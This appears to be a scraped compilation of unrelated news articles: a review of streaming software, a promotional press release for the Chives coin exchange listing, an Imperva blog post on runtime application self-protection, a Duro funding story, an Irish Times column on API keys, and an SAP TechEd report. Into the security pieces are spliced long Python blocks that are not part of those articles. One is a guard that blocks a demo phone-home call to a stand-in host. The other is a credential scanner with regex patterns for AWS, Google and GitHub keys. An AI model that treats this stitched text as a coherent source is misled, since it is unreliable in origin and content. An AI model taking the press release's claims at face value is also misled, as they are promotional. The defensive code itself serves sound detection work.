XSplit, OBS, or Streamlabs: What's the best free streaming software – Polygon

I quit my job at the start of 2020. Two months later, the U.S. went into lockdown and everyone glued themselves to their screens. So, like many avid gamers, I started streaming on Twitch. After deciding what to stream and when, and acquiring a webcam, I had to pick my broadcasting software. When you're starting out as a streamer, your budget, or lack thereof, is going to be a major factor. And to this day, I haven't felt the need to move to a paid broadcasting platform because so much can be accomplished with free options.

After a casual Google search, I initially settled on XSplit. The setup process was fairly straightforward, which took a lot of the guesswork and scouring the net for guides out of the equation. XSplit is probably best known for allowing users to stream content to multiple platforms, like Twitch, Facebook Gaming, and YouTube. It also boasts the ability to tweak video settings for resolution up to 4K and frame rates well above the standard 60fps.

That said, XSplit requires you to either create an account or sign in with an existing social media account. And unless you pay for an XSplit subscription, you'll only be able to stream to a single platform, and quality levels will be capped at 720p and 30fps.

It's also important to note that the supported features differ on each platform. For example, Twitch does not support 4K resolution in streams, while YouTube does. Also, while XSplit allows for higher frame rate settings, Twitch, Facebook Gaming, and YouTube all recommend streaming at no higher than 60fps.

When I first started, I got set up on Twitch, then decided to maximize my potential audience by creating a Facebook page and streaming to both sites simultaneously, though not with XSplit, as streaming to multiple sources is a premium feature. Then I qualified for the Twitch Affiliate program.

Without getting too off-topic, I'm going to remind everyone of the importance of reading contracts. One of the stipulations that many streamers miss in the Twitch Affiliate contract is that Twitch owns the exclusive rights to every one of their streams for 24 hours, which means that everything, including clips, cannot be uploaded or streamed on another platform. I promptly stopped dual-streaming to Facebook.

I had a lot of success using XSplit. It's a solid piece of software and has received numerous updates since I first tried it. But, in my search for the best combination of options and features from free software, I decided to move on to a different program: Open Broadcaster Software.

Aptly named, OBS is open source, which means that power users can code their own plugins and casual users can download and use them. This also means that bugs are usually caught and fixed quickly, and it's usually the first program to get new updates.

The setup process for OBS is both simpler and more complicated than the setup for XSplit: while the quick download and run-it-yourself installer work in its favor, OBS requires much more tweaking to ensure the best stream quality for your audience. The manual setup can take some serious time and research.

On top of that, OBS lacks a chat overlay and customizable themes out of the box. These stream theme overlays must be separately downloaded and manually installed, which isn't terribly difficult but takes more effort than other options.

But it isn't all bad. OBS has plenty of advantages, too. Unlike XSplit's free version, OBS allows for livestreaming at 1080p and 60fps, taking full advantage of the recommended limits. It's also less resource-intensive, saving your CPU for more important things like your game. OBS also supports multi-platform streaming.

OBS was good to me, but I never felt like it clicked. The options for making my stream look and feel the way I wanted just weren't there. Instead, my strongest recommendation for free broadcasting software goes to Streamlabs' platform.

Streamlabs is a company built for livestreamers. Because OBS is open source, users have been able to build out their own versions on top of it, enabling streamers to choose from all kinds of premade tools, like chat monitoring bots and overlays. But that's not all Streamlabs does. It also has tools for building your community and editing your clips.

Streamlabs' setup process is the easiest by far, taking advantage of Open Broadcaster Software's plug-and-play approach. The key difference, however, lies in the built-in optimizer. Rather than having to manually select the best settings for your streaming machine, the optimizer takes care of everything for you.

Where Streamlabs really shines, though, is in its customization options. Both OBS and Streamlabs have adjustable user interfaces. Simply click and drag the various informational boxes around the window to suit your needs. But Streamlabs makes personalizing the layout and design that your audience sees and interacts with much more convenient.

Streamlabs also has a bunch of free overlays available on its site. Instead of hunting for a stream overlay that matches your style and vibe, then downloading and going through the trouble of integrating it into OBS, you can simply install it directly with the click of a button. Remember to keep your hardware limits in mind, though, as every additional tool running on top of Streamlabs will take more power from your CPU.

How you set up the streaming experience and manage the backend can greatly impact your audience's first impressions, as well as make watching the stream more enjoyable. Animated backgrounds, chat management bots, and sound alerts create a more engaging experience. And it will take time to curate the perfect blend of immersive and meta features that make your stream unique.

You'll also want to be comfortable working with the settings and tweaking your stream's visuals and sound effects. While Streamlabs is the clear winner of the big three free options, some companies that offer sponsorship deals will be partnered with another company's platform, like StreamElements' OBS.

(While I was writing this article, controversy arose surrounding Streamlabs' new premium service. Despite feeling conflicted about recommending Streamlabs, I still believe that their free broadcasting software is the best choice for streamers. I'd encourage you to look further into the situation and weigh the options for yourself.)

Whether you are starting to stream as a hobby or hoping to turn it into your next career move, livestreaming requires some serious legwork. The best thing you can do is be informed of the pros and cons of each option, and choose the best fit for your streaming needs.

LBank Exchange Will List Chives coin (XCC) on November 19, 2021 – bitcoinist.com

INTERNET CITY, DUBAI, Nov. 18, 2021: LBank Exchange, a global digital asset trading platform, will list Chives coin (XCC) on November 19, 2021. For all users of LBank Exchange, the XCC/USDT trading pair will be officially available for trading at 20:00 (UTC+8) on November 19, 2021.

Since the birth of cryptocurrencies such as bitcoin and Ethereum, discussion of the environmental pollution and energy waste caused by their mining process has never stopped. As a completely decentralized green cryptocurrency with no reserve, no ICO, and community autonomy, Chives coin (XCC) can create a low-power, green and environmentally friendly blockchain system. The XCC token will be listed on LBank Exchange at 20:00 (UTC+8) on November 19, 2021, to further expand its global reach and help it achieve its vision.

Chives is an eco-friendly blockchain based on proof of space and time (PoST) without pre-mine or ICO. It's not affiliated with Chia Network Inc., but is built on Chia's outstanding open source code. As a hard fork created by community volunteers, Chives uses a combination of PoST and proof of service (PoSE) in order to prevent large mining pools from dominating.

Farmers of Chives can use free hard disk space to mine 90% of Chives openly, fairly and transparently. The income of Chives farmers is proportional to the amount of allocated space. If a farmer has 10 times more space, the farmer will get 10 times more rewards. Chives is proof that modern blockchains can be eco-friendly, safe, and effective at the same time.

The Chives project pays special attention to the development of an eco-friendly blockchain, as well as related technological products. The Chives network supports a token issuance mechanism similar to ERC-20 and supports an NFT issuance mechanism similar to ERC-721. At the moment, the project has already developed its own Chives Swap exchange, a web wallet, and a marketplace for selling pets for the future NFT game.

The game will directly promote the application and popularization of core products such as stable coins (USDT), tokens (ERC-20), NFT (ERC-721), automated exchanges (AMM), and mobile wallets on the Chives blockchain. This greatly contributes to the growth and popularization of the Chives network and will bring various ecological designs on the Chives blockchain to a new level.

Chives as a whole is based on the Chia branch, adding an asset mortgage, community autonomy, budget review and other functions. 90% of Chives is allocated to miners and the remaining 10% is allocated to participants who contribute to the Chives community ecosystem. Chives upholds the spirit of openness and open source, and encourages people from all walks of life to work together to promote the development of Chives.

The goal of the Chives project is to create an independent community and a global decentralized payment network using its own cryptocurrency, called Chives or XCC, as the main payment method. The XCC token will be listed on LBank Exchange at 20:00 (UTC+8) on November 19, 2021; investors who are interested in Chives coin can easily buy and sell XCC on LBank Exchange by then. The listing of XCC on LBank Exchange will undoubtedly help it further expand its business and draw more attention in the market.

Learn More about XCC Token:

Official Website: https://www.chivescoin.org

Twitter: https://twitter.com/chives_project

Telegram: https://t.me/chives_network

Listing Announcement on LBank Exchange: https://support.lbank.site/hc/en-gb/articles/4409594129177Chives-coin-XCC-will-be-listed-on-LBank

LBank Exchange, founded in 2015, is an innovative global trading platform for various crypto assets. LBank Exchange provides its users with safe crypto trading, specialized financial derivatives, and professional asset management services. It has become one of the most popular and trusted crypto trading platforms with over 6.4 million users in more than 210 countries around the world.

Visit us on social media:

Facebook, Twitter, LinkedIn

Contact Details:

LBK Blockchain Co. Limited

LBank Exchange

marketing@lbank.info

Protecting today's web applications requires more than a firewall – Security Boulevard

The way organizations build web applications has changed dramatically over the last several years. As a result, many organizations are considering additional security strategies to augment the Web Application Firewall (WAF) on which they have relied to protect critical digital business operations from vulnerabilities. New technology has created a development environment where the web application threat landscape grows larger and more complex every day. Fortunately, there are solutions available to shore up your web application security and account for vulnerabilities you may not know you had. Implementing these solutions will require you to think differently about web application security. In this post, we'll talk about what has changed in the web application development process that makes you vulnerable to different threats and why relying on patching alone to address them may no longer be sufficient. We'll also explain how a shift-left, inside-out approach with a unified security model will augment the protection you get from your WAF and create a more sustainable and scalable application security strategy.

Every year, we discover new vulnerabilities in commercial, off-the-shelf software, open source libraries or in dependencies introduced by other applications. The number of vulnerabilities has exploded over the last few years. As organizations wrote more code to create more applications, better tooling and better analysis found more of the vulnerabilities in it. Another cause of the vulnerability explosion lies in the way organizations compose applications. Developers are moving beyond traditional web application building methods and introducing elements such as APIs and microservices, which bring their own vulnerabilities into the mix.

Legitimate web application developers are not the only people out there looking for vulnerabilities. Imperva Research Labs reported that in the first half of 2021, Imperva blocked 40% more web application incidents in the financial services industry than over the same time period in 2020. Given what we know, this is not a surprise. The COVID pandemic has left lots of prospective attackers sitting at home out of work, potentially looking for different avenues to get money. The tools required to carry out attacks have been democratized over the years, making it easier and cheaper than ever to constantly take pot shots at applications and see what sticks. This generation of bad actors has the time and motivation to look for and exploit vulnerabilities to launch attacks on high value targets like financial services.

Applications may be categorized as first-party applications and third-party applications. First-party applications are those that your organization writes and develops itself. Let's say an eCommerce company has a website where people can add items to a shopping cart and buy them when they check out. The website is a first-party application. If this company doesn't implement the checkout itself, but instead employs another system, component, microservice, or API to do it, then it is using a third-party application working in conjunction with the first-party application (the website). Some organizations have zero development capabilities and use only third-party applications, something as simple as off-the-shelf software they deploy in their environment.

Historically, organizations have had control over first-party applications (there are blind spots that we'll address later). You have control over your own code, you can audit some of the open-source code that's coming into your environment, and so you have some level of observability. However, with most tools, you don't really have visibility into the security of third-party applications; you find yourself virtually taking the vendor's word that they are protected.

The key element that stretches between first and third-party applications is risk, and both types of applications can introduce risk back into the overall environment that you need to manage to protect your applications. One risk mitigation technique is to draw a firewall between first and third-party applications. As the threat landscape grows, this is unlikely to be sufficient. Even if your vendor patches a zero-day vulnerability, the response may be inexact, take too long, and fail to prevent the code vulnerability from showing up everywhere in your environment.

In 2021, the non-profit organization Open Web Application Security Project (OWASP), which helps website owners and security experts protect web applications from cyber attacks, introduced for the first time the concept of insecure design as the 4th most important security risk affecting web applications. This represents an overall realization that developers should consider a shift-left approach to application security, putting a greater emphasis on more rigorous threat modeling or secure design upfront in the process. Going forward, application developers may need to consider compensating controls as part of their overall design to counter bringing in risky third-party code that has unknown vulnerabilities.

OWASP's greater emphasis this year on the risks of using components with known vulnerabilities is really a sign of the times in terms of what's going on with supply chain attacks. There are more bad actors than ever trying to compromise supply chain vulnerabilities. The most efficient way to wreak supply chain havoc is to compromise a library or component that many organizations use.

Traditional security methods are highly effective at stopping threats from the outside that are trying to break into an environment, but are ineffective at stopping supply chain attacks because you just don't see what's going on inside of the application. As the code base and the number of dependencies increase, developers need to understand exactly what's going on in or around applications in the software supply chain, whether it's bad dependencies or bad packages or solutions that are around the core application, in either first-party or third-party applications.

In the positive security model, you allow the application to do what it does based on its current behavior, and anything outside of that behavior, or abnormal behavior, is just not going to work. You don't require any signatures or updates and you can protect the entire stack. You can easily deploy it by flipping a switch, with no need to constantly update it with patches and no risk of degrading the application's performance. This is where runtime application self-protection (RASP) comes in. RASP is a lightweight agent that attaches to your applications and, unlike a firewall, which protects from the outside, offers code-level protection from the inside out. RASP lives squarely in the realm of development and security,

A web application firewall is great at stopping attacks that exploit known vulnerabilities. In instances where an attack targets unknown vulnerabilities in certain code in the applications themselves, a unified positive security model including RASP provides more targeted controls designed to automatically mitigate those types of attacks. The same thing applies to client-side attacks, which target the users in their actual browser environments. With visibility from inside the application, Imperva RASP is able to understand how the individual components are working with one another and offer automated mitigation, so that enterprises can focus on business logic without compromising on security.
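The positive security model described above, as an added illustration that is not Imperva's code and not how any RASP product is implemented: a guard that learns the destinations and files an application actually uses during a learning window and, once switched to enforcement, refuses anything outside that baseline without needing attack signatures. Every name here (PositiveModel, guard, http_get, read_file) and the sample workload are assumptions made for this demo; no network or disk is touched.

```python
"""Added example (not Imperva's code): a minimal positive security model
of the kind an in-process RASP agent enforces from inside an application.

Learning mode records the (operation, target) pairs the application performs;
enforcement mode admits only pairs already in that baseline. Names and the
sample workload are assumptions constructed for this demonstration.
"""
from dataclasses import dataclass, field
from functools import wraps
from typing import Callable, List, Set, Tuple
from urllib.parse import urlsplit

Event = Tuple[str, str]  # e.g. ("egress", "api.payments.example")


class BlockedByPolicy(PermissionError):
    """Raised when a call falls outside the learned baseline."""


@dataclass
class PositiveModel:
    """Allowlist learned from observed behaviour rather than from attack signatures."""
    allowed: Set[Event] = field(default_factory=set)
    blocked: List[Event] = field(default_factory=list)
    enforcing: bool = False

    def observe(self, event: Event) -> bool:
        """In learning mode, record and admit; in enforcing mode, admit only known events."""
        if not self.enforcing:
            self.allowed.add(event)
            return True
        if event in self.allowed:
            return True
        self.blocked.append(event)  # keep a record for the security team's review
        return False


def normalise_egress(url: str) -> Event:
    """Baseline outbound traffic by host, so query strings do not inflate the allowlist."""
    return ("egress", urlsplit(url).hostname or "")


def normalise_file(path: str) -> Event:
    """Baseline file access by exact path (a real agent would also normalise '..')."""
    return ("file", path)


def guard(model: PositiveModel, normalise: Callable[[str], Event]):
    """Decorator: consult the model before letting the wrapped call proceed."""
    def decorate(fn):
        @wraps(fn)
        def wrapper(target: str, *args, **kwargs):
            if not model.observe(normalise(target)):
                raise BlockedByPolicy(f"{fn.__name__}({target!r}) is outside the learned baseline")
            return fn(target, *args, **kwargs)
        return wrapper
    return decorate


MODEL = PositiveModel()


@guard(MODEL, normalise_egress)
def http_get(url: str) -> str:
    """Stand-in for the application's HTTP client (hypothetical; no request is made)."""
    return f"200 OK from {urlsplit(url).hostname}"


@guard(MODEL, normalise_file)
def read_file(path: str) -> str:
    """Stand-in for the application's file access (hypothetical; nothing is read)."""
    return f"<contents of {path}>"


def run_demo() -> dict:
    """Learn from a constructed normal workload, then enforce against it."""
    MODEL.allowed.clear()
    MODEL.blocked.clear()
    MODEL.enforcing = False
    for url in ("https://api.payments.example/charge", "https://cdn.assets.example/logo.png"):
        http_get(url)
    read_file("/etc/app/config.yaml")

    MODEL.enforcing = True
    results = {"known_ok": http_get("https://api.payments.example/refund?id=42").startswith("200")}
    try:  # a dependency phoning home to a host never seen during learning
        http_get("https://unknown-host.example/collect")
        results["unknown_blocked"] = False
    except BlockedByPolicy:
        results["unknown_blocked"] = True
    results["blocked_events"] = list(MODEL.blocked)
    return results


if __name__ == "__main__":
    print(run_demo())
```

The learning window is the weak point of any positive model: it must cover the application's legitimate behaviour but must not be left open long enough for an intruder's activity to be baselined as normal, which is why real deployments review the learned allowlist before flipping to enforcement.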

Deficiencies in so many organizations' ability to protect the overall supply chain have driven changes in today's regulatory landscape, and RASP is now frequently identified in regulations as an effective control in delivering that protection.

This post was adapted from the webinar, Mitigate Vulnerabilities in Application Code Without Emergency Patching. Watch it on demand here.

See RASP in action yourself. Start a free trial today.

The post Protecting today's web applications requires more than a firewall appeared first on Blog.

*** This is a Security Bloggers Network syndicated blog from Blog authored by Bruce Lynch. Read the original post at: https://www.imperva.com/blog/protecting-todays-web-applications-requires-more-than-a-firewall/

Duro drags hardware product development into the age of agile – TechCrunch

To software developers, the process of creating a hardware product can seem distinctly 1980s. Even in the most high-tech of workflows, there are tons of error-prone and potentially expensive manual steps, including spreadsheets, confusion and a general feeling of the will to live sagging away through the musty, solder-stained floorboards of the hardware development shop. Along comes Duro and the $4 million the company just raised, in an attempt to bring some agile methodology sanity to a final-bill-of-materials.top-assembly.final.final.final.final.no-really-final-this-time.xls world.

Duro's fundraising round was led by B2B SaaS investors Bonfire Ventures, with follow-on money from hard-tech investors Riot Ventures. The new funding will be used to expand sales and marketing teams and to further develop Duro's product lifecycle management (PLM) solutions.

"I am a former electrical engineer. For 20 years I designed and manufactured products: IoT, drones, telecom equipment, wearables, cleantech, you name it. I got frustrated with how much of my time was being spent managing the most fundamental elements of hardware development: CAD files, your bill of materials and your supply chain data," explains Duro's CEO Michael Corr. "There's a product category called Product Lifecycle Management, or PLM, which is meant to be a receptacle for that information, for centralizing and managing it. It includes revision control, and you use it with your own teams, as well as sharing it with your contract manufacturers. And yet none of the tools I used were actually saving time or actually providing value at the end of the day. It's all done so manually and is so process-driven that it was often easier to just use spreadsheets. That's still the prevalent technology today, because the established tools are just so damn complicated and prone to error, and they're not actually providing value."

With an axe to grind against the status quo, co-founders Michael Corr and Kellan O'Connor developed Duro as a cloud platform to centralize all product data and remove the friction of connecting disparate teams and tools. The goal is transparency, giving everyone from the product teams, the engineering teams and the suppliers and manufacturing teams access to the most accurate and most recent data at all times.

"To simplify things a little, the hardware industry is dominated by a bimodal culture. You have the older generation that came into the workforce in the '80s and '90s, who established these toolsets that we have today. Meanwhile, there is a gap: young engineers were more interested in learning web, mobile and app development, as it was so much more in vogue. There wasn't a continuation of young engineers entering the hardware space," Corr outlines the market landscape where Duro is staking out its territory. "But now they're coming back. Hardware has proven itself to be a sexy product. IoT happened, and the cost of developing hardware came down drastically. Now what we are seeing is a wave of a younger generation of engineers that's entering the workforce. They are the ones that Duro is going after. They are used to the culture from software development, and they have different standards for the software they use."

In other words, where SaaS, GitHub and DevOps processes completely changed how software is delivered on an ongoing basis, Duro wants to take similar mechanics and invite the hardware folks to join the current millennium.

"GitHub did an excellent job of proving that it can be done. You can have a single cloud-hosted source of your source code control, and then you build an ecosystem of tools and people and tasks around it. And everyone's always pointing to GitHub. In the hardware industry, traditionally, that hasn't been the case. You have multiple teams, doing their disparate responsibilities: electrical engineering, mechanical engineering, procurement, manufacturing, etc. Because there hasn't been a concept of centralizing it, everybody has their own copy of the data," explains Corr. "Everybody has their own separate copy of the bill of materials, for example, and that creates a problem. It creates this additional necessity of overhead to manage all those communication channels and making sure that everybody has the latest copy."

"We're incredibly excited to partner with Duro, which is bringing a fresh solution to a big market dominated by old companies. When a startup like Duro lowers the barrier to entry for a whole new set of users, it positions them to get the lion's share of that new addressable market," said Jim Andelman, co-founder and managing director at Bonfire Ventures. "Customer affinity for Duro's platform is off the charts: it's clear to us that this is the PLM solution of choice for engineering-driven businesses."

In addition to the product itself, the company is innovating on its business model, taking a leaf out of the SaaS playbook.

"There's been a lot of friction in software sales for hardware in the past. Very expensive applications, driven by user-license business models. And there are rarely trials available; if you want to use it, you just have to pay for it and just accept what you get. So Duro innovates a little bit there too. We have three subscription packages. The starter package is for companies who know that spreadsheets are not a good solution and want to get into properly managed data, centralized and controlled environments. The Pro version works right out of the box, without the complex configuration and setup needed by other products. It's designed for teams who are at the cusp of doing their first round of production, and want to do proper revision control and interface with their suppliers," explains Corr. "Our enterprise package is more the expansive package for teams that have outgrown those lower two tiers, or that are just more established and have existing workflows."

The starter package is $450 a month or $5,400 a year. The Pro package weighs in at $750 per month or around $9,000 per year. The enterprise package is a little bit more open ended, depending on the needs of the customer. The Duro team told me that they have contracts ranging from $25,000 to $100,000, depending on how the software is configured.

"Given our extensive experience investing in full-stack businesses, we know that issues surrounding data continuity are synonymous with hardware manufacturing and weigh heavily on the industry," said Will Coffield, co-founder and general partner at Riot Ventures. "We love Duro's approach to modernizing hardware design/development, using automation to replace manual processes and connect teams to information for intelligent and efficient collaboration."

Chris Horn: Digital authentication is an intriguing innovation space – The Irish Times

"Hackers rarely actually break in; instead they simply log in" is a worn cliché among computer security protagonists. Hackers can and do exploit defects in software code, where errors by the original authors are manipulated to enable unintended access.

If you are a Windows, Mac, Android or iPhone user, no doubt you receive regular notices that your device should now be updated to the latest version of its host software, so as to repair newly discovered security vulnerabilities.

But if a hacker can discover or deduce the password credentials for an account, it is obviously much simpler to just log in using these and so gain access.

Passwords have been critical to protect online access to our email, online shopping carts, newspaper subscriptions, bank accounts and much more. We are strongly advised that we should never use the same password for different services, never make them too short, and never make them easy to guess. We should always change them regularly, should always use random collections of numbers and letters and punctuation marks, and should keep them private.

In short, they are incredibly inconvenient but apparently an awkward necessity for our digital lives.

Help with remembering passwords is offered by digital vaults and password managers that can administer your password portfolio on your behalf. They can synchronise passwords across the different devices you may own, and usually offer to scan the dark web looking for any compromised accounts.

However, the industry, led by Google, Microsoft, Apple and others, is now rapidly moving to a password-less world in which passwords can be completely avoided. The most obvious alternatives are based on biometrics, such as scanning your face or a fingerprint.

But you may baulk at major multinationals easily accumulating a huge collection of personal identity information across much of the planet, potentially invaluable to governments and police agencies alike.

Whatever the pros and cons of the various authentication approaches for us to log in to our computers, you may not realise that software systems also make extensive use of passwords. These take the form of digital API keys used to gain access to databases and other software services across the web.

These authentication credentials are not at all intended to be remembered by humans, and so usually take the form of lengthy collections of letters and numbers, randomly generated as needed.

Unlike a login password which identifies a particular user, they instead identify a particular software application, component or subsystem that may in fact be used by very many human users.

For example, if a particular app on your smart device uses a Google map (such as a taxi-hailing app, or a courier or food delivery app), the app must present its API key to Google's mapping service each time the app is run, regardless of which particular user happens to be running the app. The API key is set when the app is built, and is used by Google to verify legitimate use of its mapping service by an authorised app.

Digital keys are routinely used within application software to access payment services, databases, and other web services.

While Google does not charge app developers for integrating its mapping service into their apps, some software services offered over the web to developers do charge for their use. The API key is then critical to authenticating and charging the relevant app owner, who may then recover the cost by charging app fees to end users.

Thankfully, when you use an app, you do not need to know these various internal API keys in addition to your own personal passwords. Nevertheless, the keys must appear somewhere deep within the system, and are a potential security vulnerability. If a hacker discovers such a digital secret, they can potentially script software to explore a service and any data which it may have accumulated, or run up costs for fraudulent use.

Software developers frequently work in teams, and may also re-use software published as open source by the community in software repositories. It is not unusual to find API keys and authentication credentials unintentionally published within software source code.

Fortunately for software developers, there are a number of tools which can scan the source code, searching for keys and credentials associated with particular web-based services, and generate an appropriate warning if discovered.
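An added example of the kind of source scanner the column refers to, written for this page rather than taken from any particular tool: it combines the publicly documented shapes of a few provider credentials (AWS access key IDs begin with AKIA and are 20 characters long, Google API keys begin with AIza and are 39 characters long, classic GitHub personal access tokens begin with ghp_ and are 40 characters long) with a Shannon-entropy check for long, random-looking values assigned to secret-like variable names. The sample source lines are constructed for the demo and the key-shaped values in them are fabricated, not real credentials; the entropy threshold is a tuning assumption.

```python
"""Added example: a small source-code secret scanner of the kind the column
describes. Not the code of any named tool. Sample lines and the key-shaped
values in them are constructed for this demonstration.
"""
import math
import re
from dataclasses import dataclass
from typing import Iterable, List

# Publicly documented credential shapes: a cheap, low-false-positive first pass.
PROVIDER_PATTERNS = {
    "AWS access key ID": re.compile(r"\bAKIA[0-9A-Z]{16}\b"),
    "Google API key": re.compile(r"\bAIza[0-9A-Za-z_\-]{35}\b"),
    "GitHub personal access token": re.compile(r"\bghp_[0-9A-Za-z]{36}\b"),
}

# Generic second pass: an assignment to a secret-looking name with a long quoted literal.
ASSIGNMENT = re.compile(
    r"(?i)\b(api[_-]?key|secret|token|password|passwd)\b\s*[:=]\s*['\"]([^'\"]{16,})['\"]"
)
# Assumed threshold (bits per character): random base62 strings sit near 4.5 to 5,
# while strings built from dictionary words stay well below 4.
ENTROPY_THRESHOLD = 4.0


def shannon_entropy(s: str) -> float:
    """Bits of entropy per character, estimated from the string's own symbol frequencies."""
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in (s.count(ch) for ch in set(s)))


def redact(value: str) -> str:
    """Never echo a full secret into CI logs; show just enough to locate it."""
    return value[:4] + "..." + value[-2:]


@dataclass(frozen=True)
class Finding:
    line_no: int
    kind: str
    snippet: str


def scan_lines(lines: Iterable[str]) -> List[Finding]:
    """Report provider-shaped keys first, then high-entropy secret assignments."""
    findings: List[Finding] = []
    for no, line in enumerate(lines, start=1):
        provider_hit = False
        for kind, pattern in PROVIDER_PATTERNS.items():
            for m in pattern.finditer(line):
                findings.append(Finding(no, kind, redact(m.group(0))))
                provider_hit = True
        if provider_hit:
            continue
        m = ASSIGNMENT.search(line)
        if m and shannon_entropy(m.group(2)) >= ENTROPY_THRESHOLD:
            findings.append(Finding(no, "high-entropy secret assignment", redact(m.group(2))))
    return findings


# Constructed sample source. The provider-shaped values are built from filler
# characters so they are obviously not live credentials.
SAMPLE_SOURCE = [
    'MAPS_KEY = "' + "AIza" + "0" * 35 + '"',            # Google-shaped, fabricated
    "aws_access_key_id = " + "AKIA" + "0" * 16,           # AWS-shaped, fabricated
    'token = "' + "ghp_" + "x" * 36 + '"',                # GitHub-shaped, fabricated
    'password = "changeme"',                               # too short for the generic rule
    'token = "aaaaaaaaaaaaaaaaaaaaaaaa"',                  # long but zero entropy: ignored
    'secret = "thisisnotreallyasecretvalue"',              # dictionary words: below threshold
    'api_key = "q8Jf2kL9zX4vB7nM1pR6tW3yH5cD0gS8"',       # constructed random-looking value
    'label = "The quick brown fox jumps over the lazy dog"',  # not a secret-like name
]


def summarise(findings: List[Finding]) -> List[str]:
    """One warning line per finding, in the form a pre-commit hook would print."""
    return [f"line {f.line_no}: possible {f.kind} ({f.snippet})" for f in findings]


if __name__ == "__main__":
    for warning in summarise(scan_lines(SAMPLE_SOURCE)):
        print(warning)
```

Run as a pre-commit hook or in CI, a scanner like this catches the accidental publication the column describes before the commit leaves the developer's machine; the redaction in the output matters because the scanner's own logs are otherwise one more place the secret ends up.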

But in the same way that users are being encouraged to go password-less and rely instead on other authentication mechanisms, innovation may ultimately displace the need for API keys, so removing authentication vulnerabilities and also avoiding the need for scanning and detection tools.

A more sophisticated approach might use a two-stage or even a multistage handshake, and perhaps only be run in full when an app is installed or updated.

Digital authentication is an intriguing innovation space because of the counter-measures and counter-counter-measures continuously being conceived by the good and bad guys alike.

SAP TechEd sets sights on hyperscalers with developer tools – TechTarget

SAP is expanding its tools and services for developers of all skill levels, with several announcements from this week's SAP TechEd 2021 virtual conference.

SAP TechEd is an annual gathering of the SAP developer community that provides information on new tools and services, along with learning content and sessions that enable SAP developers to expand their skills.

For experienced developers, SAP is now providing individual access to the free tier model of SAP Business Technology Platform (BTP), SAP's integrated development environment. Previously, SAP BTP was available to only licensed SAP customers and partners.

SAP is also now offering its veteran Advanced Business Application Programming (ABAP) developers a cloud-ready development environment for the programming language inside SAP S/4HANA Cloud. Formally named SAP S/4HANA Cloud ABAP Environment, the new platform is derived from the SAP BTP ABAP cloud environment known as Steampunk and is referred to as "Embedded Steampunk."

For business users with limited development skills or citizen developers, SAP made SAP AppGyver generally available. SAP AppGyver is a low-code/no-code development platform that SAP acquired in February. The platform will be available in SAP BTP.

In order to enhance the skills of developers at all levels, SAP launched a new SAP Learning site, which contains learning content including expert-led sessions, hands-on training and microlearning videos.

The intent behind the SAP TechEd announcements is to provide developers with tools and services to build applications that can address some of the challenges businesses face, including the pandemic, global climate change and inequality, Juergen Mueller, CTO at SAP, said during his executive keynote at SAP TechEd.

Opening the free tier for SAP BTP is something that SAP developers have been asking for, he said.

"SAP BTP is now available to individual developers, so you can now discover and experience SAP BTP services without any financial commitment," Mueller said. "This has been a journey that many [SAP developers] have been following very closely and have contributed actively to this milestone."

One of the problems companies are facing is a shortage of skilled developers, which makes the availability of low-code/no-code platforms like AppGyver and the opportunity to build skills through SAP Learning site more important than ever, according to Mueller.

"A huge technology talent gap is opening up that needs to be filled, so SAP is giving open access to learning resources and providing low-code and no-code solutions as a way out of this dilemma," he said.

The products and services announced at TechEd should provide value for various developer levels, said Tammy Powlas, a business analyst and SAP Mentor, an SAP technology advocate selected by members of the SAP community, who works at a utilities company. She pointed specifically to individual access to the free tier for SAP BTP and general availability of AppGyver.

"I know as a [Project Management Professional] that the Project Management Institute says there's a shortage of developers and the citizen developer is the answer, so it's good to see SAP focus on AppGyver as the low-code and no-code solution."

The Learning site, SAP's relaunched learning center, is a key for developer success, she said.

"What links these all together is the free SAP Learning site that includes free training for low-code/no-code and SAP BTP solutions," Powlas said.

The new tools and services fill some gaps for SAP developers that needed to be filled, said Holger Mueller, vice president and principal analyst at Constellation Research.

AppGyver, for example, is an overdue item in SAP's low-code toolset, which should see more uptake now that it's embedded in SAP BTP, Mueller said.

"The free tier access for SAP BTP is a good move but SAP needs to convince on its merit, but they are not there yet," he said. "The S/4HANA Cloud ABAP Environment, Embedded Steampunk, is very good and overdue, this is the one key announcement for the existing customer and ecosystem."

SAP needs to get in the game against the developer tool sets from public cloud hyperscalers Amazon, Google Cloud Platform and Azure, which are becoming go-to developer environments for professional development and low-code and no-code development, said Joshua Greenbaum, principal at Enterprise Applications Consulting. He said he believes the announcements from TechEd are a step in that direction and should help developers stay within the SAP platforms to build applications.

"SAP wants these extensions, net-new developments, citizen apps, RPA -- everything possible -- to run on SAP BTP because that makes their platform sticky and helps them fend off the hyperscalers who are making big inroads into their own developer communities," Greenbaum said.

Indeed, SAP appears to have gotten the free tier for SAP BTP right, agreed Jon Reed, co-founder of Diginomica, an enterprise computing industry analysis firm.

"It was a long time coming, and developers and [SAP developer] community leaders have been pressing SAP for this kind of developer agreement for years," he said. "We need to see how it plays out, but it appears that SAP now has a free tier on par with the hyperscalers and open source development environments."

SAP's commitment to low-code and no-code is clear and useful for both experienced and citizen developers, Reed said, but the availability of SAP AppGyver is a little underwhelming given the availability of low-code tools.

"Making AppGyver available to more citizen developers is welcome, but there are multiple tools for different uses, including third-party tools," he said. "SAP needs to provide more roadmap guidance and use case clarity on its various low-code environments going forward, like AppGyver, Ruum and Business Application Studio."

But Greenbaum countered that having a wealth of low-code and no-code options that all perform different functions -- AppGyver is particularly suited to building iOS and Android mobile interfaces -- is not a bad thing.

"It's both the blessing and the curse of any large enterprise software company, not just SAP, to have a confusing number of options," he said. "Everyone gets a little baffled, but any good bar has a good selection of beers, so it's about what people want."

The main goal for SAP in offering the development platforms and services is to prove that it's still an innovating enterprise company, Greenbaum said.

"SAP really has to build back its developer community," he said. "It has to build back this sense that they are the leading-edge innovators and break away from what it's tending to look like, which at times is just the legacy place to go to keep the lights on. If they don't capture innovation at the edge, they're doomed to legacy ERP status."

Jim O'Donnell is a TechTarget news writer who covers ERP and other enterprise applications for SearchSAP and SearchERP.

Here is the original post:

SAP TechEd sets sights on hyperscalers with developer tools - TechTarget

Synopsys Research Finds Vulnerabilities in 97% of Applications, 36% Impacted by Critical- or High-Risk Vulnerabilities – Yahoo Finance

2021 Software Vulnerability Snapshot report examines prevalence of vulnerabilities identified by Synopsys Application Security Testing Services.

